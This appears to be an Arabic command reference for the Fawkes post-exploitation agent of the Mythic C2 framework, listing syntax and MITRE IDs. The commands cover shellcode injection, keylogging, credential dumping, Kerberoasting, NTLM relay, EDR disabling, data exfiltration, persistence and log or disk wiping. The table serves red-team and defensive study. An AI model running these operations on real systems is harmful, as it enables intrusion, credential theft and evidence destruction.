history-scrub | `history-scrub [-action list\|clear\|clear-all] [-user <username>]` | سرد أو مسح ملفات تاريخ الأوامر/التطبيقات. يغطي bash، zsh، fish، PowerShell، python، mysql، والمزيد. عبر المنصات (T1070.003).
hollow | `hollow -filename <shellcode> [-target <process>] [-ppid <pid>] [-block_dlls true]` | تجويف العملية — إنشاء عملية معلقة، كتابة الشيل كود، إعادة توجيه التنفيذ. **Windows:** CREATE_SUSPENDED + SetThreadContext، تزوير PPID، حظر DLL، تزيين PEB (إخفاء ImagePath/CommandLine/WindowTitle). **Linux (amd64/arm64):** PTRACE_TRACEME + كتابة /proc/mem. **macOS:** ptrace + واجهات Mach VM (task_for_pid, mach_vm_allocate, mach_vm_write, mach_vm_protect) — يتطلب root. MITRE T1055.012, T1036.
ide-recon | `ide-recon -action <vscode\|jetbrains\|all> [-user <filter>]` | تعداد تكوينات IDE — إضافات VS Code، مضيفات SSH عن بُعد، المشاريع الحديثة، الإعدادات مع الأسرار. مصادر بيانات JetBrains، خوادم النشر، المشاريع الحديثة. عبر المنصات (T1005, T1083).
ifconfig | `ifconfig` | سرد واجهات الشبكة مع العناوين، MAC، MTU، والأعلام. عبر المنصات (Windows/Linux/macOS).
inline-assembly | `inline-assembly` | **(Windows فقط)** تنفيذ تجميع .NET في الذاكرة باستخدام CLR. يدعم وسيطات سطر الأوامر. استخدم `start-clr` أولاً لسير عمل تصحيح AMSI.
inline-execute | `inline-execute` | **(Windows فقط)** تنفيذ ملف كائن Beacon (BOF/COFF) في الذاكرة. يدعم جميع أنواع الوسيطات: سلاسل نصية (z)، سلاسل نصية عريضة (Z)، أعداد صحيحة (i)، قصيرة (s)، وثنائية (b).
reflective-load | `reflective-load -dll_b64 <base64_dll> [-function <export>]` | **(Windows فقط)** تحميل PE أصلي (DLL) من الذاكرة في العملية الحالية. تعيين PE يدوي مع نسخ الأقسام، إصلاحات النقل، حل الاستيراد، واستدعاء DllMain. اختياريًا استدعاء الدوال المُصدرة (T1620).
iptables | `iptables -action <status\|rules\|nat\|add\|delete\|flush> [-rule <args>] [-table <name>]` | **(لينكس فقط)** تعداد وإدارة جدار الحماية Linux عبر iptables/nftables/ufw. إعادة توجيه IP، تتبع الاتصال، سرد القواعد وتعديلها. MITRE T1562.004.
jobkill | `jobkill -id <task-uuid>` | إيقاف مهمة قيد التشغيل بواسطة معرف المهمة. استخدم `jobs` لسرد المهام قيد التشغيل. عبر المنصات.
jobs | `jobs` | سرد المهام قيد التشغيل حاليًا مع معرف المهمة، اسم الأمر، والمدة. عبر المنصات.
jxa | `jxa -code '<script>' [-timeout 60]` or `jxa -file /path/to/script.js` | **(macOS فقط)** تنفيذ نصوص JavaScript للتشغيل الآلي (JXA) مع وصول جسر ObjC إلى أطر Foundation، AppKit، Security. يدخل الكود المضمن وإدخال الملف (T1059.007).
kerberoast | `kerberoast -server <DC> -username <user@domain> -password <pass> [-spn <SPN>]` | طلب تذاكر TGS لحسابات SPN واستخراج التجزئات بتنسيق hashcat للتكسير دون اتصال. التعداد التلقائي عبر LDAP. عبر المنصات (T1558.003).
klist | `klist -action <list\|purge\|dump\|import> [-server <filter>] [-ticket <base64>] [-path <path>]` | تعداد، تفريغ، تطهير، واستيراد تذاكر Kerberos. الاستيراد يتيح تمرير التذكرة: Windows يحقن kirbi عبر LSA، Linux/macOS يكتب ccache ويضبط KRB5CCNAME. عبر المنصات (T1558, T1550.003).
keychain | `keychain -action <list\|dump\|find-password\|find-internet\|find-cert> [-service <name>] [-server <host>]` | **(macOS فقط)** الوصول إلى سلسلة مفاتيح macOS — سرد السلاسل، تفريغ البيانات الوصفية، العثور على كلمات مرور عامة/إنترنت، تعداد الشهادات.
kerb-delegation | `kerb-delegation -action <all\|unconstrained\|constrained\|rbcd\|monitor> -server <DC> -username <user@domain> -password <pass> [-duration <s>] [-interval <s>]` | تعداد علاقات تفويض Kerberos — غير مقيدة، مقيدة (مع انتقال البروتوكول)، RBCD. إجراء **monitor** (Windows/SYSTEM فقط) يستقصي LSA عن TGTs الواردة ويصدرها كبلوبات kirbi. عبر المنصات باستثناء monitor (T1550.003, T1558).
keylog | `keylog -action <start\|stop\|dump\|status\|clear>` | مسجل ضربات لوحة المفاتيح منخفض المستوى. Windows: SetWindowsHookEx. Linux: /dev/input evdev. macOS: IOKit HID. يكتشف أحداث اللصق Ctrl+V/Cmd+V ويلتقط محتوى الحافظة. تتبع سياق النافذة على جميع المنصات (T1056.001).
lateral-check | `lateral-check -hosts <IPs/CIDRs> [-timeout <seconds>]` | اختبار خيارات الحركة الجانبية ضد الأهداف — يتحقق من اتصال SMB، WinRM، RDP، RPC، SSH ويقترح الطرق المناسبة. عبر المنصات (T1046, T1021).
last | `last [-action logins\|failed\|reboot] [-count 25] [-user <username>]` | عرض تاريخ تسجيل الدخول، محاولات تسجيل الدخول الفاشلة، وأحداث إقلاع/إيقاف النظام. Linux: يحلل wtmp/btmp. Windows: سجلات أحداث الأمان/النظام. macOS: `last` أصلي + سجل موحد. (T1087.001, T1110, T1082).
ldap-query | `ldap-query -action <users\|computers\|groups\|domain-admins\|spns\|asrep\|admins\|disabled\|gpo\|ou\|password-never-expires\|trusts\|unconstrained\|constrained\|dacl\|gmsa\|bloodhound\|query> -server <DC>` | الاستعلام عن Active Directory عبر LDAP. استعلامات محددة مسبقًا للمستخدمين، أجهزة الكمبيوتر، المجموعات، مسؤولي المجال، جميع المسؤولين (adminCount)، SPNs، القابلين لـ AS-REP، الحسابات المعطلة، GPOs، الوحدات التنظيمية، كلمة المرور لا تنتهي أبدًا، علاقات الثقة بالمجال، التفويض غير المقيد/المقيد، تحليل DACL، استخراج كلمة مرور gMSA، جمع BloodHound CE v6 (المستخدمين/أجهزة الكمبيوتر/المجموعات/الوحدات التنظيمية/GPOs/علاقات الثقة لتحليل الرسم البياني)، أو مرشحات LDAP مخصصة. عبر المنصات (T1087.002, T1482, T1555, T1003, T1615).
ldap-write | `ldap-write -action <add-member\|remove-member\|set-attr\|add-attr\|remove-attr\|set-spn\|disable\|enable\|set-password\|shadow-cred\|clear-shadow-cred\|create-machine\|rbcd\|delete\|gpo-task\|gpo-script\|template-esc1\|template-esc4> -server <DC> -target <obj>` | تعديل كائنات AD عبر LDAP. عضوية المجموعة، السمات، SPNs، تمكين/تعطيل الحساب، إعادة تعيين كلمة المرور، بيانات اعتماد الظل، إنشاء حساب آلة، تفويض RBCD، حذف الكائن. إساءة استخدام GPO: حقن المهام المجدولة (gpo-task) أو نصوص بدء التشغيل (gpo-script). ADCS: تعديل قوالب الشهادات لاستغلال ESC1/ESC4. عبر المنصات (T1098, T1556.006, T1484.001, T1649).
kill | `kill -pid <PID>` | إنهاء عملية بواسطة PID. عبر المنصات (Windows/Linux/macOS).
laps | `laps -server <DC> -username <user@domain> -password <pass> [-filter <computer>]` | قراءة كلمات مرور LAPS من AD عبر LDAP. يدعم LAPS v1 (ms-Mcs-AdmPwd) و Windows LAPS v2 (ms-LAPS-Password). عبر المنصات (T1552.006).
lsa-secrets | `lsa-secrets -action <dump\|cached>` | **(Windows فقط)** استخراج أسرار LSA (كلمات مرور الخدمة، مفاتيح DPAPI، حساب الآلة) وبيانات اعتماد المجال المخزنة مؤقتًا (تنسيق DCC2/MSCacheV2 hashcat). يتطلب SYSTEM (T1003.004, T1003.005).
launchagent | `launchagent -action <install\|remove\|list> -label <com.example.name> [-path <exe>] [-daemon true]` | **(macOS فقط)** تثبيت، إزالة، أو سرد ثبات LaunchAgent/LaunchDaemon. ينشئ plist مع RunAtLoad+KeepAlive.
link | `link -host <ip> -port <port> [-connection_type tcp\|namedpipe] [-pipe_name <name>]` | الارتباط بعميل P2P عبر TCP أو أنبوب مسمى للتجسس الداخلي. وضع الأنبوب المسمى يستخدم منفذ SMB 445 لحركة مرور Windows أكثر خفاءً. عبر المنصات TCP، أنبوب مسمى فقط Windows (T1572).
ln | `ln -target <existing> -link <new> [-symbolic true] [-force true]` | إنشاء روابط رمزية أو صلبة. الروابط الرمزية يمكن أن تشير إلى مسارات غير موجودة. وضع القوة يستبدل الرابط الموجود. عبر المنصات (T1036).
linux-logs | `linux-logs -action <list\|read\|logins\|clear\|truncate\|shred> [-file <path>] [-search <filter>] [-lines <n>]` | **(لينكس فقط)** سرد، قراءة، مسح، أو التلاعب بملفات سجلات Linux وسجلات تسجيل الدخول الثنائية (wtmp/btmp/utmp). يدعم الإزالة الانتقائية للأسطر والتمزيق الآمن (T1070.002).
logonsessions | `logonsessions [-action list\|users] [-filter <name>]` | **(Windows, Linux, macOS)** تعداد جلسات تسجيل الدخول النشطة — المستخدمون، معرفات الجلسة، المحطات، حالة الاتصال. التصفية حسب اسم المستخدم. Windows: WTS API. Linux: تحليل utmp. macOS: تحليل utmpx.
lolbin | `lolbin -action <technique> -path <payload/code/URL> [-export <func>] [-args <extra>]` | **(Windows, Linux, macOS)** تنفيذ وكيل LOLBin/GTFOBin. Windows: rundll32, msiexec, regsvcs, regasm, mshta, certutil, regsvr32, installutil, vbs. عبر المنصات: python, lua, perl, ruby, node, awk. Linux: curl, wget, gcc. macOS: osascript, swift, open, curl. T1218/T1059.
ls | `ls [path]` | سرد الملفات والمجلدات مع المالك/المجموعة والطوابع الزمنية. تكامل مستعرض الملفات. الإعداد الافتراضي هو دليل العمل الحالي.
make-token | `make-token -username <user> -domain <domain> -password <pass> [-action impersonate\|spawn\|auto-verify -command <cmd>]` | **(Windows فقط)** إنشاء رمز من بيانات الاعتماد: انتحاله، إطلاق عملية، أو **auto-verify** (انتحال ثم سلسلة whoami + getprivs) (T1134.002).
masquerade | `masquerade -source <file> -technique <type> [-disguise <value>] [-in_place]` | تمويه الملفات وإخفاؤها — تمويه الملفات (امتداد مزدوج، RtLO، مسافة، تطابق العملية) أو إخفاؤها من التعداد (إظهار/إخفاء). Windows: سمات +H/+S. Linux: بادئة نقطة. macOS: UF_HIDDEN + بادئة نقطة (T1036, T1564.001).
mkdir | `mkdir <directory>` | إنشاء دليل جديد (ينشئ الدلائل الأصلية إذا لزم الأمر).
module-stomp | `module-stomp -pid <PID> [-dll_name <DLL>]` | **(Windows فقط)** حقن الشيل كود عن طريق دهس قسم .text الخاص بـ DLL شرعي. يتم تنفيذ الشيل كود من مساحة عنوان DLL الموقعة، متجاوزًا كشف الذاكرة الخاصة (T1055.001).
modules | `modules [-pid <PID>] [-filter <name>]` | سرد الوحدات/DLLs/المكتبات المحملة في عملية مع تصفية اسم اختيارية. عبر المنصات (T1057).
mem-scan | `mem-scan -pid <PID> -pattern <string> [-hex] [-max_results <n>] [-context_bytes <n>]` | البحث في ذاكرة العملية عن أنماط البايتات مع إخراج تفريغ سداسي. Windows: VirtualQueryEx/ReadProcessMemory. Linux: /proc/pid/maps+mem. macOS: mach_vm_region/mach_vm_read (مسح ذاتي فقط). يدعم أنماط النص والست عشري. عبر المنصات (T1005, T1057).
mount | `mount [-filter <substring>] [-fstype <type>]` | سرد أنظمة الملفات المثبتة مع الجهاز، نقطة التثبيت، النوع، والخيارات. يدعم التصفية بالاسم أو نوع نظام الملفات. عبر المنصات (T1082).
mv | `mv <source> <destination>` | نقل أو إعادة تسمية ملف من المصدر إلى الوجهة.
named-pipes | `named-pipes [-filter <pattern>]` | **(Windows, Linux, macOS)** سرد الأنابيب المسماة (Windows)، مآخذ Unix domain و FIFOs (Linux/macOS) لاكتشاف IPC. يدعم تصفية السلسلة الفرعية (T1083).
net-enum | `net-enum -action <users\|groups\|groupmembers\|admins\|sessions\|shares\|domainusers\|domaingroups\|domaininfo\|loggedon\|mapped> [-target <host>] [-group <name>]` | **(Windows, Linux, macOS)** تعداد الشبكة عبر المنصات. المستخدمون، المجموعات، أعضاء المجموعة، المسؤولون، الجلسات، المشاركات. Windows: Win32 NetAPI (استعلامات المجال، محركات الأقراص المعينة). Linux: /etc/passwd + /etc/group + utmp + NFS/Samba. macOS: dscl + who + sharing. (T1033, T1049, T1087, T1135).
net-group | `net-group -action <list\|members\|user\|privileged> -server <DC> [-group <name>] [-user <sAMAccountName>] -username <user@domain> -password <pass>` | تعداد عضويات مجموعة AD عبر LDAP. حل الأعضاء العودي، البحث عن مجموعة المستخدم، تعداد المجموعات المميزة. عبر المنصات (T1069.002).
net-user | `net-user -action <add\|delete\|info\|password\|group-add\|group-remove\|disable\|enable\|lockout> -username <name> [-password <pass>] [-group <group>]` | إدارة حسابات المستخدمين المحلية وعضوية المجموعة. Windows: netapi32 API. Linux: useradd/userdel/usermod/chpasswd. macOS: dscl/dseditgroup. تعطيل/تمكين/قفل لمحاكاة برامج الفدية T1531. عبر المنصات (T1136.001, T1098, T1531).
net-stat | `net-stat [-state <LISTEN\|ESTABLISHED\|...>] [-proto <tcp\|udp>] [-port <number>] [-pid <number>]` | سرد اتصالات الشبكة النشطة والمنافذ المستمعة مع البروتوكول، الحالة، PID، واسم العملية. يدعم التصفية حسب الحالة، البروتوكول، المنفذ، ومعرف العملية. عبر المنصات.
ntdll-unhook | `ntdll-unhook [-action unhook\|check] [-dll ntdll.dll\|kernel32.dll\|kernelbase.dll\|advapi32.dll\|user32.dll\|all] [-source disk\|knowndlls]` | **(Windows فقط)** إزالة ربطات EDR المضمنة من ملفات DLL عن طريق استعادة قسم .text من نسخة نظيفة. يدعم 5 ملفات DLL أو `all`. `check` يبلغ عن الربطات دون تعديل. مصدر `knowndlls` يستخدم كائنات قسم \\KnownDlls\\ (يتجنب إدخال/إخراج القرص — أكثر أمانًا لـ OPSEC) (T1562.001).
syscalls | `syscalls [-action status\|list\|init]` | **(Windows فقط)** محلل استدعاءات النظام غير المباشر. يوزع صادرات ntdll لحل أرقام استدعاءات Nt* وينشئ أدوات دليل تقفز إلى كتلة syscall;ret الخاصة بـ ntdll. عندما تكون نشطة، تتجاوز أوامر الحقن ربطات API الخاصة بالنطاق المستخدم (T1106).
opus-injection | `opus-injection` | **(Windows فقط)** حقن العملية القائم على الاستدعاء. المتغير 1: سلسلة معالج Ctrl-C. المتغير 4: PEB KernelCallbackTable. [التفاصيل](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#opus-injection)
persist | `persist -method <method> -action <install\|remove\|check>` | **(Windows, Linux, macOS)** تثبيت أو إزالة الثبات. Windows: السجل، مجلد بدء التشغيل، اختطاف COM، شاشة التوقف، ifeo، winlogon، معالج الطباعة، إمكانية الوصول، إعداد نشط، مزود الوقت، شاشة المنفذ، حدث WMI (T1546.003)، netsh-helper (T1546.007). Linux: crontab، systemd، ملف تعريف القشرة، مفتاح SSH، xdg-autostart، motd (root، T1546)، rc-local (root، T1037.004)، apt-hook (root، T1546)، udev-rule (root، T1546). macOS: launchagent، periodic (root، T1053.003)، folder-action (T1546)، login-item (T1547.015)، auth-plugin (root، T1547.002)، dylib-hijack (T1574.004، مسح/تثبيت/إزالة)، xpc-service (MachServices + KeepAlive). جميع الطرق تدعم التثبيت/الإزالة/السرد.
persist-enum | `persist-enum [-category <all\|platform-specific>]` | **(Windows, Linux, macOS)** تعداد للقراءة فقط لآليات الثبات. Windows: السجل، بدء التشغيل، المهام، الخدمات. Linux: cron، systemd، ملفات تعريف القشرة، مفاتيح SSH، LD_PRELOAD، قواعد udev، وحدات النواة، motd، وظائف at، خدمات D-Bus، وحدات PAM، خطافات الحزمة، نصوص logrotate، مرسل NetworkManager، anacron. macOS: LaunchAgents، عناصر تسجيل الدخول، نصوص دورية، إضافات المصادقة، emond، وظائف at (T1547, T1546, T1053, T1543, T1556).
password-managers | `password-managers [-depth <N>]` | اكتشاف قواعد بيانات مدير كلمات المرور وملفات التكوين — KeePass (.kdbx)، 1Password، Bitwarden، LastPass، Dashlane، KeePassXC. عبر المنصات (T1555).
poolparty-injection | `poolparty-injection` | **(Windows فقط)** حقن الشيل كود باستخدام تقنيات PoolParty التي تسيء استخدام آليات تجمع الخيوط في Windows. جميع المتغيرات الثمانية مدعومة. [التفاصيل](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#poolparty-injection)
ping | `ping -hosts <IP/CIDR/range> [-port 445]` or `ping -action exfil-icmp -target <IP> -file <path>` | الوصول إلى المضيف عبر TCP connect (T1018) + تسريب بيانات ICMP عبر حمولات طلب الصدى مع ترميز XOR وتموج (T1048.003, T1095).
pipe-server | `pipe-server -action <check\|impersonate> [-name <pipe>] [-timeout 30]` | **(Windows فقط)** انتحال الأنبوب المسمى لتصعيد الامتيازات. إنشاء خادم أنبوب، انتظار اتصال عميل متميز، انتحال الرمز. يتطلب SeImpersonatePrivilege (T1134.001).
printspoofer | `printspoofer [-timeout 15]` | **(Windows فقط)** PrintSpoofer تصعيد الامتيازات — SeImpersonate إلى SYSTEM عبر Print Spooler. ينشئ أنبوبًا مسمى، يطلق اتصال spooler عبر OpenPrinterW، ينتحل رمز SYSTEM. خطوة واحدة NETWORK SERVICE → SYSTEM (T1134.001).
pkg-list | `pkg-list [-filter <substring>]` | سرد الحزم والبرامج المثبتة. تعداد dpkg/rpm/apk (Linux)، Homebrew/التطبيقات (macOS)، أو مفاتيح إلغاء التثبيت في السجل (Windows). يدعم تصفية الاسم. عبر المنصات (T1518).
port-scan | `port-scan -hosts <IPs/CIDRs> [-ports <ports>] [-timeout <s>]` | فحص TCP connect لاكتشاف خدمات الشبكة. يدعم CIDR، نطاقات IP، ونطاقات المنافذ. عبر المنصات.
powershell | `powershell <command> [--encoded]` | **(Windows فقط)** تنفيذ أمر PowerShell عبر powershell.exe مع أعلام OPSEC مقواة (مختصرة، عشوائية). يدعم وضع الأوامر المشفرة لإخفاء الوسيطات من شجرة العملية.
prefetch | `prefetch -action <list\|parse\|delete\|clear> [-name <exe>] [-count <max>]` | **(Windows فقط)** تحليل وإدارة ملفات Prefetch في Windows. سرد البرامج المنفذة، تحليل تاريخ التشغيل (حتى 8 طوابع زمنية)، حذف إدخالات محددة، أو مسح الكل. يدعم الملفات المضغوطة MAM (T1070.004).
privesc-check | `privesc-check -action <all\|auto-escalate\|privileges\|services\|registry\|uac\|dll-hijack\|dll-plant\|dll-sideload\|dll-exports\|hijack-execute\|hijack-deploy\|hijack-cleanup\|hijack-trigger\|service-registry\|...>` | تعداد واستغلال تصعيد الامتيازات. `auto-escalate`: سلسلة مهام فرعية آلية — تعداد جميع المتجهات ثم محاولة أفضل تصعيد متاح (تجاوز UAC، سرقة الرمز، أو sudo). `hijack-execute`: مصنع DLL وكيل آلي — يقرأ صادرات DLL المستهدف، يجمّع الخادم DLL وكيل مع شيل كود مضمن (mingw). `hijack-deploy`: ينشر DLL وكيل (يعيد تسمية الأصل، يضع الوكيل). `hijack-trigger`: يشغل الاختطاف — إعادة تشغيل خدمة (`-trigger restart -service_name <svc>`) أو إطلاق عملية (`-trigger spawn -source <exe>`) لتحميل DLL الوكيل. `hijack-cleanup`: يعكس الاختطاف المنشور (يحذف الوكيل، يستعيد الأصل). Windows: امتيازات الرمز، خدمات غير مقتبسة، AlwaysInstallElevated، تسجيل الدخول التلقائي، UAC، ملفات unattend، فحص اختطاف DLL (DLLs الشبحية، مسار PATH قابل للكتابة، KnownDLLs)، زرع DLL مع تزوير الطابع الزمني، تحميل DLL جانبي، تعداد صادرات PE (dll-exports مع إنشاء ملف DEF)، إساءة استخدام أذونات سجل الخدمة. Linux: SUID/SGID، الإمكانيات، sudo، الحاويات، اختطاف cron، NFS no_root_squash، وحدات systemd، رموز sudo، اختطاف PATH، مجموعة docker، المجموعات الخطرة، قواعد Polkit، خطافات modprobe، حقن ld.so.preload، وحدات الأمان (AppArmor/SELinux). macOS: LaunchDaemons، TCC، اختطاف dylib، SIP. عبر المنصات (T1548, T1574.001, T1574.002, T1574.009, T1574.011).
psexec | `psexec -host <target> -command <cmd> [-name <svcname>] [-cleanup <true\|false>]` or `psexec -action check -host <target>` | **(Windows فقط)** تنفيذ الأوامر على المضيفين البعيدين عبر إنشاء خدمة SCM — حركة جانبية على غرار PSExec. `check` يتحقق من المتطلبات الأساسية (SMB 445، الوصول إلى SCM، المشاركات الإدارية) دون تنفيذ. MITRE T1021.002, T1569.002.
proc-info | `proc-info -action <info\|connections\|mounts\|modules> [-pid <PID>]` | **(لينكس فقط)** فحص عميق لـ /proc: تفاصيل العملية (سطر الأوامر، البيئة، الإمكانيات، cgroups، مساحات الأسماء، FDs)، اتصالات الشبكة مع حل PID، التثبيتات، وحدات النواة. MITRE T1057.
process-mitigation | `process-mitigation [-action query\|set] [-pid <PID>] [-policy <policy>]` | **(Windows فقط)** الاستعلام أو تعيين سياسات التخفيف للعملية (DEP، ASLR، CIG، ACG، CFG). تعيين CIG لمنع تحميل DLL غير الموقعة (دفاع EDR). MITRE T1480.
process-tree | `process-tree [-pid <PID>] [-filter <name>]` | عرض التسلسل الهرمي للعملية كشجرة مع علاقات الأصل-الفرع. يساعد في تحديد أهداف الحقن وأدوات الأمان. عبر المنصات (T1057).
procdump | `procdump [-action lsass\|dump\|search] [-pid <PID>]` | تفريغ ذاكرة العملية. Windows: MiniDumpWriteDump مع اكتشاف تلقائي لـ LSASS. Linux: تفريغ منطقة /proc/pid/mem. إجراء البحث يجد العمليات التي تحمل بيانات اعتماد. يرفع إلى Mythic وينظف من القرص. MITRE T1003.001, T1003.007.
proxy-check | `proxy-check [-test_url <URL>]` | كشف إعدادات الوكيل من متغيرات البيئة، تكوين نظام التشغيل (السجل، ملفات التكوين)، ونقل Go. اختبار اتصال اختياري. عبر المنصات (T1016).
ps | `ps [-filter <name>] [-pid <PID>] [-ppid <PPID>] [-user <name>] [-v]` | سرد العمليات الجارية مع تكامل مستعرض عمليات Mythic. التصفية بالاسم، PID، PID الأصل، أو اسم المستخدم. عبر المنصات.
ptrace-inject | `ptrace-inject -action <check\|inject> [-pid <PID>] [-filename <shellcode>] [-restore <true>] [-timeout <30>]` | **(لينكس فقط، amd64/arm64)** حقن العملية عبر ptrace — PTRACE_ATTACH/POKETEXT/SETREGS مع استعادة السجل والتعليمات البرمجية. فحص مسبق لـ Yama ptrace_scope مع توجيهات قابلة للتنفيذ. وضع الفحص يبلغ عن ptrace_scope، الإمكانيات، والمرشحين (T1055.008).
pty | `pty [-shell /bin/bash] [-rows 24] [-cols 80]` | **(Linux/macOS)** بدء جلسة قشرة PTY تفاعلية عبر المهام التفاعلية لـ Mythic. محاكاة طرفية كاملة مع إدخال/إخراج ثنائي الاتجاه (T1059).
pwd | `pwd` | طباعة دليل العمل.
read-memory | `read-memory <dll_name> <function_name> <start_index> <num_bytes>` | **(Windows فقط)** قراءة بايتات من عنوان دالة DLL.
reg | `reg -action <read\|write\|delete\|search\|save\|creds> [-hive HKLM] [-path ...] [...]` | **(Windows فقط)** عمليات سجل موحدة — قراءة، كتابة، حذف، بحث، وحفظ الخلايا (T1012, T1112, T1003.002).
remote-reg | `remote-reg -action <query\|enum\|set\|delete> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-hive HKLM] [-path ...] [-name <val>]` | قراءة/كتابة السجل على مضيفي Windows عن بُعد عبر WinReg RPC عبر أنابيب SMB المسماة. يدعم تمرير التجزئة (Pass-the-hash). عبر المنصات (T1012, T1112, T1021.002).
remote-service | `remote-service -action <list\|query\|create\|start\|stop\|delete\|modify-path\|trigger\|dll-sideload> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-name <svc>] [-binpath <path>]` | إدارة الخدمات على مضيفي Windows عن بُعد عبر SVCCTL RPC. عمليات قياسية + حركة جانبية متقدمة: modify-path (اختطاف مسار الخدمة الحالي)، trigger (إنشاء خدمة بدأت بالزناد)، dll-sideload (اختطاف سجل ServiceDll). تمرير التجزئة (Pass-the-hash). عبر المنصات (T1569.002, T1543.003, T1574.001).
rev2self | `rev2self` | **(Windows فقط)** العودة إلى سياق الأمان الأصلي بإسقاط أي رمز انتحال نشط.
route | `route [-destination <IP>] [-gateway <IP>] [-interface <name>]` | عرض جدول التوجيه للنظام مع تصفية اختيارية. Windows: GetIpForwardTable API، Linux: /proc/net/route + IPv6، macOS: netstat -rn. عبر المنصات (T1016).
rpfwd | `rpfwd start <port> <remote_ip> <remote_port>` / `rpfwd forward <port> <target_ip> <target_port> [bind_addr]` / `rpfwd stop <port>` | إعادة توجيه المنفذ: عكسي (Mythic يوجه إلى الهدف) أو أمامي (الوكيل يوجه إلى هدف داخلي). عبر المنصات (T1090).
rm | `rm [-path <path>] [-secure true]` | إزالة ملف أو دليل. `-secure true` يكتب فوقها ببيانات عشوائية (3 مرات) قبل الحذف، مما يمنع الاسترداد الجنائي (T1070.004).
run | `run <command>` | تنفيذ أمر قشرة وإرجاع الإخراج.
runas | `runas -command <cmd> -username <user> -password <pass> [-domain <domain>] [-netonly true]` | تنفيذ أمر كمستخدم مختلف. Windows: CreateProcessWithLogonW (يدعم /netonly). Linux/macOS: setuid كـ root، أو sudo -S مع كلمة المرور. عبر المنصات (T1134.002).
schtask | `schtask -action <create\|query\|delete\|run\|list\|enable\|disable\|stop> -name <name> [-program <path>] [-trigger <type>] [-filter <substring>]` | إدارة المهام المجدولة. Windows: Task Scheduler COM API. Linux: crontab، مؤقتات systemd، وظائف at. macOS: LaunchAgents/LaunchDaemons، crontab، at. عبر المنصات (T1053).
screenshot | `screenshot [-action single\|record] [-interval <sec>] [-duration <sec>] [-max_frames <n>]` | التقاط لقطة شاشة واحدة أو تسجيل لقطات مستمرة على فترات. يرفع كـ PNG. وضع التسجيل: فاصل زمني/مدة/الحد الأقصى للإطارات قابلة للتكوين، قابلة للإيقاف عبر jobkill. Windows: GDI. macOS: screencapture. Linux: X11/Wayland اكتشاف تلقائي. عبر المنصات (T1113).
secret-scan | `secret-scan [-path /home/user] [-depth 5] [-max_results 100]` | البحث في الملفات عن الأسرار، مفاتيح API، المفاتيح الخاصة، سلاسل الاتصال، والأنماط الحساسة. 42 نمط تعبير عادي (AWS، GitHub، Slack، Stripe، Vault، DigitalOcean، Shopify، Databricks، New Relic، PagerDuty، Okta، Sentry، Datadog، CircleCI، إلخ) مع إخفاء القيمة. مسح دليل محدود العمق، يتخطى الدلائل المزعجة. عبر المنصات (T1552.001, T1005).
secure-delete | `secure-delete [-action delete\|wipe\|wipe-mbr] -path <file_or_device> [-passes <n>] [-confirm DESTROY]` | حذف الملفات بأمان، مسح البيانات، أو تدمير سجلات الإقلاع. `delete`: الكتابة العشوائية + الإزالة. `wipe`: تدمير نمطي عدواني (T1485). `wipe-mbr`: الكتابة فوق سجل الإقلاع MBR/GPT على جهاز القرص الخام (T1561). بوابة الأمان مطلوبة. عبر المنصات (T1070.004, T1485, T1561).
security-info | `security-info [-action all\|edr\|minifilter-enum\|kernel-drivers]` | الإبلاغ عن الوضع الأمني وعناصر التحكم النشطة، كشف منتجات EDR/XDR (أكثر من 20 بائعًا)، تعداد برامج تشغيل minifilter مع تصنيف EDR، أو سرد برامج تشغيل النواة المحملة مع تحليل EDR/استدعاء. SELinux/AppArmor/seccomp/ASLR (Linux)، SIP/Gatekeeper/FileVault (macOS)، Defender/UAC/Credential Guard/BitLocker (Windows). عبر المنصات (T1082, T1518.001).
sniff | `sniff [-action capture\|poison\|relay\|ldap-relay] [-interface eth0] [-duration 30] [-response_ip <target>] [-protocols llmnr,nbtns,mdns] [-ports listen:target]` | شم الشبكة، التسميم، وترحيل NTLM. `capture`: استخراج بيانات الاعتماد السلبي (HTTP، FTP، NTLM، Kerberos، LDAP، SMTP AUTH، Telnet). `poison`: مستجيب نشط مع التقاط تجزئة SMB+HTTP — تجزئات NTLMv2 في وضع hashcat 5600. `relay`: ترحيل NTLM إلى SMB الهدف. `ldap-relay`: ترحيل NTLM إلى LDAP الهدف مع عمليات ما بعد المصادقة (whoami، add-computer، RBCD، dump-laps) (T1040, T1557.001).
share-hunt | `share-hunt -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-depth <n>] [-filter <all\|credentials\|configs\|code>]` | الزحف في مشاركات SMB عبر مضيفين متعددين بحثًا عن ملفات حساسة — بيانات اعتماد، تكوينات، نصوص برمجية. بحث تكراري في الدلائل مع دعم تمرير التجزئة. عبر المنصات (T1135, T1039).
smb | `smb -action <shares\|ls\|cat\|upload\|rm\|mkdir\|mv\|push\|exfil\|taint\|share-perms\|share-spider\|share-search> -host <target> -username <user> [-password <pass>] [-hash <NT hash>] [-share <name>] [-path <path>] [-depth <n>] [-extensions <.docx,.xlsx>] [-patterns <*.kdbx,web.config>] [-max_results <n>]` | عمليات ملفات SMB2 على المشاركات البعيدة — سرد، تصفح، قراءة/كتابة/حذف، دفع لنقل الأدوات الجانبية، تسريب لتسريب البيانات، تلويث لزرع الملفات. **share-perms**: اختبار وصول القراءة/الكتابة على جميع المشاركات. **share-spider**: سرد دليل تكراري مع مرشحات العمق/الامتداد. **share-search**: العثور على ملفات حساسة عبر المشاركات باستخدام أنماط مضمنة أو مخصصة. مصادقة NTLM + تمرير التجزئة. عبر المنصات (T1021.002, T1039, T1080, T1135, T1550.002, T1570, T1048.003).
service | `service -action <query\|start\|stop\|restart\|create\|delete\|list\|enable\|disable\|edr-enum\|edr-kill> -name <name> [-binpath <path>] [-confirm EDR-KILL]` | **(Windows, Linux, macOS)** إدارة الخدمات + استهداف EDR/AV. `edr-enum`: كشف خدمات الأمان المثبتة (أكثر من 60 توقيعًا). `edr-kill`: إيقاف+تعطيل EDR المكتشف (بوابة أمان مطلوبة). Windows SCM، Linux systemd، macOS launchd (T1543, T1489, T1562.001).
setenv | `setenv -action <set\|unset> -name <NAME> [-value <VALUE>]` | تعيين أو إلغاء تعيين متغيرات البيئة في عملية الوكيل. عبر المنصات.
